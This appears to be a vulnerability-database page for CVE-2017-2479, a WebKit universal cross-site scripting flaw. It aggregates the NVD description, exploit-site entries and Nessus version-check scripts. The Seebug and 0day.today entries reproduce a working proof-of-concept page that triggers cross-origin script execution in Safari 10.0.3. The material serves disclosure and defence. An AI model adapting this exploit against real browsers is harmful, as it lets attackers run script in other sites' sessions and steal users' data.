An issue was discovered in certain Apple products. iOS before 10.3 is
affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is
affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is
affected. The issue involves the "WebKit" component. It allows remote
attackers to bypass the Same Origin Policy and obtain sensitive information
via a crafted web site.
#### Notes
Author| Note
---|---
[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see <https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit>. webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8.

{"seebug": [{"lastseen": "2017-11-19T12:00:00", "description": "This is somewhat similar to https://crbug.com/663476.\r\n\r\nHere's a snippet of Container::replaceAllChildren.\r\n\r\n```\r\nwhile (RefPtr<Node> child = m_firstChild) {\r\n removeBetween(nullptr, child->nextSibling(), *child);\r\n notifyChildNodeRemoved(*this, *child);\r\n}\r\n```\r\n\r\nIf the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up to fire a focus event which runs arbitrary JavaScript code, which can make an iframe(|g| in the PoC) that has an attached frame but has no parent.\r\n\r\nTested on Safari 10.0.3(12602.4.8).\r\n\r\n```\r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet inp = f.contentDocument.head.appendChild(document.createElement('input'));\r\nlet link = inp.appendChild(document.createElement('link'));\r\nlink.rel = 'stylesheet';\r\nlink.href = 'data:,aaaaazxczxczzxzcz';\r\n\r\nlet btn = f.contentDocument.body.appendChild(document.createElement('button'));\r\nbtn.id = 'btn';\r\nbtn.onfocus = () => {\r\n btn.onfocus = null;\r\n\r\n window.g = inp.appendChild(document.createElement('iframe'));\r\n window.g.onload = () => {\r\n window.g.onload = null;\r\n\r\n window.g.src = 'javascript:alert(location)';\r\n let xml = `\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<script>\r\ndocument.documentElement.appendChild(parent.g);\r\n\r\n</sc` + `ript>\r\n<element a=\"1\" a=\"2\" />\r\n</svg>`;\r\n\r\n let h = document.body.appendChild(document.createElement('iframe'));\r\n h.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));\r\n };\r\n\r\n window.g.src = 
'https://abc.xyz/';\r\n};\r\n\r\nf.contentWindow.location.hash = 'btn';\r\ninp.textContent = '';\r\n\r\n</script>\r\n</body>\r\n</html>\r\n```", "cvss3": {}, "published": "2017-04-07T00:00:00", "type": "seebug", "title": "WebKit: UXSS via a focus event and a link element (CVE-2017-2479)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2479"], "modified": "2017-04-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92922", "id": "SSV:92922", "sourceData": "\n <html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet inp = f.contentDocument.head.appendChild(document.createElement('input'));\r\nlet link = inp.appendChild(document.createElement('link'));\r\nlink.rel = 'stylesheet';\r\nlink.href = 'data:,aaaaazxczxczzxzcz';\r\n\r\nlet btn = f.contentDocument.body.appendChild(document.createElement('button'));\r\nbtn.id = 'btn';\r\nbtn.onfocus = () => {\r\n btn.onfocus = null;\r\n\r\n window.g = inp.appendChild(document.createElement('iframe'));\r\n window.g.onload = () => {\r\n window.g.onload = null;\r\n\r\n window.g.src = 'javascript:alert(location)';\r\n let xml = `\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<script>\r\ndocument.documentElement.appendChild(parent.g);\r\n\r\n</sc` + `ript>\r\n<element a=\"1\" a=\"2\" />\r\n</svg>`;\r\n\r\n let h = document.body.appendChild(document.createElement('iframe'));\r\n h.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));\r\n };\r\n\r\n window.g.src = 'https://abc.xyz/';\r\n};\r\n\r\nf.contentWindow.location.hash = 'btn';\r\ninp.textContent = '';\r\n\r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92922", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-10T02:10:16", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": 
"zdt", "title": "Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2479"], "modified": "2017-04-12T00:00:00", "id": "1337DAY-ID-27571", "href": "https://0day.today/exploit/description/27571", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1119\r\n \r\nThis is somewhat similar to https://crbug.com/663476.\r\n \r\nHere's a snippet of Container::replaceAllChildren.\r\n \r\nwhile (RefPtr<Node> child = m_firstChild) {\r\n removeBetween(nullptr, child->nextSibling(), *child);\r\n notifyChildNodeRemoved(*this, *child);\r\n}\r\n \r\nIf the location hash value is set, the page will give focus to the associated element. However, if there is a stylesheet that has not been loaded yet, the focusing will be delayed until the stylesheet gets loaded. The problem is that when the link element linked to the last pending stylesheet is removed from the parent, the notifyChildNodeRemoved function may end up to fire a focus event which runs arbitrary JavaScript code, which can make an iframe(|g| in the PoC) that has an attached frame but has no parent.\r\n \r\nTested on Safari 10.0.3(12602.4.8).\r\n-->\r\n \r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<script>\r\n \r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet inp = f.contentDocument.head.appendChild(document.createElement('input'));\r\nlet link = inp.appendChild(document.createElement('link'));\r\nlink.rel = 'stylesheet';\r\nlink.href = 'data:,aaaaazxczxczzxzcz';\r\n \r\nlet btn = f.contentDocument.body.appendChild(document.createElement('button'));\r\nbtn.id = 'btn';\r\nbtn.onfocus = () => {\r\n btn.onfocus = null;\r\n \r\n window.g = inp.appendChild(document.createElement('iframe'));\r\n window.g.onload = () => {\r\n window.g.onload = null;\r\n \r\n window.g.src = 'javascript:alert(location)';\r\n let xml = `\r\n<svg 
xmlns=\"http://www.w3.org/2000/svg\">\r\n<script>\r\ndocument.documentElement.appendChild(parent.g);\r\n \r\n</sc` + `ript>\r\n<element a=\"1\" a=\"2\" />\r\n</svg>`;\r\n \r\n let h = document.body.appendChild(document.createElement('iframe'));\r\n h.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));\r\n };\r\n \r\n window.g.src = 'https://abc.xyz/';\r\n};\r\n \r\nf.contentWindow.location.hash = 'btn';\r\ninp.textContent = '';\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/27571", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2022-03-23T15:51:28", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2479", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": 
"AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479"], "modified": "2019-03-19T13:40:00", "cpe": [], "id": "CVE-2017-2479", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2479", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2023-01-11T14:24:45", "description": "Versions of iTunes prior to 12.6 are affected by multiple vulnerabilities :\n\n - A use-after-free condition exists that is triggered when handling RenderBox objects. With specially crafted web content, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2463)\n - A flaw exists that allows a universal cross-site scripting (UXSS) attack. This flaw exists because the 'notifyChildNodeRemoved()' function in 'WebCore/dom/ContainerNodeAlgorithms.cpp' executes script code synchronously. This may allow a context-dependent attacker to create a specially crafted web page that executes arbitrary script code in a user's browser session within the trust relationship between their browser and any server. (CVE-2017-2479)\n - A flaw exists that allows a UXSS attack. This flaw exists because the program does not properly revalidates the 'SubframeLoader::requestFrame()' function in 'WebCore/loader/SubframeLoader.cpp'. This may allow a context-dependent attacker to create a specially crafted web page that executes arbitrary script code in a user's browser session within the trust relationship between their browser and any server. 
(CVE-2017-2480)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "iTunes < 12.6 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:itunes:*:*:*:*:*:*:*:*"], "id": "700114.PRM", "href": "https://www.tenable.com/plugins/nnm/700114", "sourceData": "Binary data 700114.prm", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:24:51", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.6. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple vulnerabilities exist in the expat component, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities to cause a denial of service condition or the execution of arbitrary code in the context of the current user. 
(CVE-2009-3270, CVE-2009-3560, CVE-2009-3720, CVE-2012-1147, CVE-2012-1148, CVE-2012-6702, CVE-2015-1283, CVE-2016-0718, CVE-2016-4472, CVE-2016-5300)\n\n - Multiple vulnerabilities exist in the SQLite component, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities by convincing a user to open a specially crafted file, to cause a denial of service condition or the execution of arbitrary code in the context of the current user. (CVE-2013-7443, CVE-2015-3414, CVE-2015-3415, CVE-2015-3416, CVE-2015-3717, CVE-2015-6607, CVE-2016-6153)\n\n - An information disclosure vulnerability exists in the APNs server component due to client certificates being transmitted in cleartext. A man-in-the-middle attacker can exploit this to disclose sensitive information.\n (CVE-2017-2383)\n\n - A use-after-free error exists in the WebKit component due to improper handling of RenderBox objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2463)\n\n - Multiple universal cross-site scripting (XSS) vulnerabilities exist in the WebKit component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these vulnerabilities, by convincing a user to visit a specially crafted web page, to execute arbitrary script code in a user's browser session. (CVE-2017-2479, CVE-2017-2480, CVE-2017-2493)\n\n - An integer overflow condition exists in the libxslt component in the xsltAddTextString() function in transform.c due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause an out-of-bounds write, resulting in the execution of arbitrary code. 
(CVE-2017-5029)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.6 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3270", "CVE-2009-3560", "CVE-2009-3720", "CVE-2012-1147", "CVE-2012-1148", "CVE-2012-6702", "CVE-2013-7443", "CVE-2015-1283", "CVE-2015-3414", "CVE-2015-3415", "CVE-2015-3416", "CVE-2015-3717", "CVE-2015-6607", "CVE-2016-0718", "CVE-2016-4472", "CVE-2016-5300", "CVE-2016-6153", "CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6.NASL", "href": "https://www.tenable.com/plugins/nessus/100025", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100025);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n 
\"CVE-2009-3270\",\n \"CVE-2009-3560\",\n \"CVE-2009-3720\",\n \"CVE-2012-1147\",\n \"CVE-2012-1148\",\n \"CVE-2012-6702\",\n \"CVE-2013-7443\",\n \"CVE-2015-1283\",\n \"CVE-2015-3414\",\n \"CVE-2015-3415\",\n \"CVE-2015-3416\",\n \"CVE-2015-3717\",\n \"CVE-2015-6607\",\n \"CVE-2016-0718\",\n \"CVE-2016-4472\",\n \"CVE-2016-5300\",\n \"CVE-2016-6153\",\n \"CVE-2017-2383\",\n \"CVE-2017-2463\",\n \"CVE-2017-2479\",\n \"CVE-2017-2480\",\n \"CVE-2017-5029\"\n );\n script_bugtraq_id(\n 36097,\n 37203,\n 52379,\n 74228,\n 75491,\n 75973,\n 76089,\n 76970,\n 79354,\n 90729,\n 91159,\n 91483,\n 91528,\n 91546,\n 96767,\n 97175,\n 97176\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-22-1\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-28-2\");\n script_xref(name:\"EDB-ID\", value:\"12509\");\n\n script_name(english:\"Apple iTunes < 12.6 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.6. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple vulnerabilities exist in the expat component,\n the most severe of which are remote code execution\n vulnerabilities. An unauthenticated, remote attacker can\n exploit these vulnerabilities to cause a denial of\n service condition or the execution of arbitrary code in\n the context of the current user. (CVE-2009-3270,\n CVE-2009-3560, CVE-2009-3720, CVE-2012-1147,\n CVE-2012-1148, CVE-2012-6702, CVE-2015-1283,\n CVE-2016-0718, CVE-2016-4472, CVE-2016-5300)\n\n - Multiple vulnerabilities exist in the SQLite component,\n the most severe of which are remote code execution\n vulnerabilities. 
An unauthenticated, remote attacker can\n exploit these vulnerabilities by convincing a user to\n open a specially crafted file, to cause a denial of\n service condition or the execution of arbitrary code in\n the context of the current user. (CVE-2013-7443,\n CVE-2015-3414, CVE-2015-3415, CVE-2015-3416,\n CVE-2015-3717, CVE-2015-6607, CVE-2016-6153)\n\n - An information disclosure vulnerability exists in the\n APNs server component due to client certificates being\n transmitted in cleartext. A man-in-the-middle attacker\n can exploit this to disclose sensitive information.\n (CVE-2017-2383)\n\n - A use-after-free error exists in the WebKit component\n due to improper handling of RenderBox objects. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2017-2463)\n\n - Multiple universal cross-site scripting (XSS)\n vulnerabilities exist in the WebKit component due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, by convincing a user to visit a\n specially crafted web page, to execute arbitrary script\n code in a user's browser session. (CVE-2017-2479,\n CVE-2017-2480, CVE-2017-2493)\n\n - An integer overflow condition exists in the libxslt\n component in the xsltAddTextString() function in\n transform.c due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this to cause an out-of-bounds write, resulting in the\n execution of arbitrary code. 
(CVE-2017-5029)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207599\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00000.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d1057132\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00010.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?65be44ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0718\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.6\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T14:24:52", "description": "The version of Apple iTunes running on the remote host is prior to 12.6. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple vulnerabilities exist in the expat component, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities to cause a denial of service condition or the execution of arbitrary code in the context of the current user. (CVE-2009-3270, CVE-2009-3560, CVE-2009-3720, CVE-2012-1147, CVE-2012-1148, CVE-2012-6702, CVE-2015-1283, CVE-2016-0718, CVE-2016-4472, CVE-2016-5300)\n\n - Multiple vulnerabilities exist in the SQLite component, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities by convincing a user to open a specially crafted file, to cause a denial of service condition or the execution of arbitrary code in the context of the current user. (CVE-2013-7443, CVE-2015-3414, CVE-2015-3415, CVE-2015-3416, CVE-2015-3717, CVE-2015-6607, CVE-2016-6153)\n\n - An information disclosure vulnerability exists in the APNs server component due to client certificates being transmitted in cleartext. 
A man-in-the-middle attacker can exploit this to disclose sensitive information.\n (CVE-2017-2383)\n\n - A use-after-free error exists in the WebKit component due to improper handling of RenderBox objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2463)\n\n - Multiple universal cross-site scripting (XSS) vulnerabilities exist in the WebKit component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these vulnerabilities, by convincing a user to visit a specially crafted web page, to execute arbitrary script code in a user's browser session. (CVE-2017-2479, CVE-2017-2480, CVE-2017-2493)\n\n - An integer overflow condition exists in the libxslt component in the xsltAddTextString() function in transform.c due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause an out-of-bounds write, resulting in the execution of arbitrary code. (CVE-2017-5029)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.6 Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3270", "CVE-2009-3560", "CVE-2009-3720", "CVE-2012-1147", "CVE-2012-1148", "CVE-2012-6702", "CVE-2013-7443", "CVE-2015-1283", "CVE-2015-3414", "CVE-2015-3415", "CVE-2015-3416", "CVE-2015-3717", "CVE-2015-6607", "CVE-2016-0718", "CVE-2016-4472", "CVE-2016-5300", "CVE-2016-6153", "CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/100026", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100026);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2009-3270\",\n \"CVE-2009-3560\",\n \"CVE-2009-3720\",\n \"CVE-2012-1147\",\n \"CVE-2012-1148\",\n \"CVE-2012-6702\",\n \"CVE-2013-7443\",\n \"CVE-2015-1283\",\n \"CVE-2015-3414\",\n \"CVE-2015-3415\",\n \"CVE-2015-3416\",\n \"CVE-2015-3717\",\n \"CVE-2015-6607\",\n \"CVE-2016-0718\",\n \"CVE-2016-4472\",\n \"CVE-2016-5300\",\n \"CVE-2016-6153\",\n \"CVE-2017-2383\",\n \"CVE-2017-2463\",\n \"CVE-2017-2479\",\n \"CVE-2017-2480\",\n \"CVE-2017-5029\"\n );\n script_bugtraq_id(\n 36097,\n 37203,\n 52379,\n 74228,\n 75491,\n 75973,\n 76089,\n 76970,\n 79354,\n 90729,\n 91159,\n 91483,\n 91528,\n 91546,\n 96767,\n 97175,\n 97176\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-22-1\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-28-2\");\n script_xref(name:\"EDB-ID\", value:\"12509\");\n\n script_name(english:\"Apple iTunes < 12.6 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of 
iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes running on the remote host is prior to\n12.6. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple vulnerabilities exist in the expat component,\n the most severe of which are remote code execution\n vulnerabilities. An unauthenticated, remote attacker can\n exploit these vulnerabilities to cause a denial of\n service condition or the execution of arbitrary code in\n the context of the current user. (CVE-2009-3270,\n CVE-2009-3560, CVE-2009-3720, CVE-2012-1147,\n CVE-2012-1148, CVE-2012-6702, CVE-2015-1283,\n CVE-2016-0718, CVE-2016-4472, CVE-2016-5300)\n\n - Multiple vulnerabilities exist in the SQLite component,\n the most severe of which are remote code execution\n vulnerabilities. An unauthenticated, remote attacker can\n exploit these vulnerabilities by convincing a user to\n open a specially crafted file, to cause a denial of\n service condition or the execution of arbitrary code in\n the context of the current user. (CVE-2013-7443,\n CVE-2015-3414, CVE-2015-3415, CVE-2015-3416,\n CVE-2015-3717, CVE-2015-6607, CVE-2016-6153)\n\n - An information disclosure vulnerability exists in the\n APNs server component due to client certificates being\n transmitted in cleartext. A man-in-the-middle attacker\n can exploit this to disclose sensitive information.\n (CVE-2017-2383)\n\n - A use-after-free error exists in the WebKit component\n due to improper handling of RenderBox objects. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2017-2463)\n\n - Multiple universal cross-site scripting (XSS)\n vulnerabilities exist in the WebKit component due to\n improper validation of user-supplied input. 
An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, by convincing a user to visit a\n specially crafted web page, to execute arbitrary script\n code in a user's browser session. (CVE-2017-2479,\n CVE-2017-2480, CVE-2017-2493)\n\n - An integer overflow condition exists in the libxslt\n component in the xsltAddTextString() function in\n transform.c due to improper validation of user-supplied\n input. An unauthenticated, remote attacker can exploit\n this to cause an out-of-bounds write, resulting in the\n execution of arbitrary code. (CVE-2017-5029)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207599\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207598\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00000.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d1057132\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8b01bc68\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00010.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?65be44ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0718\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
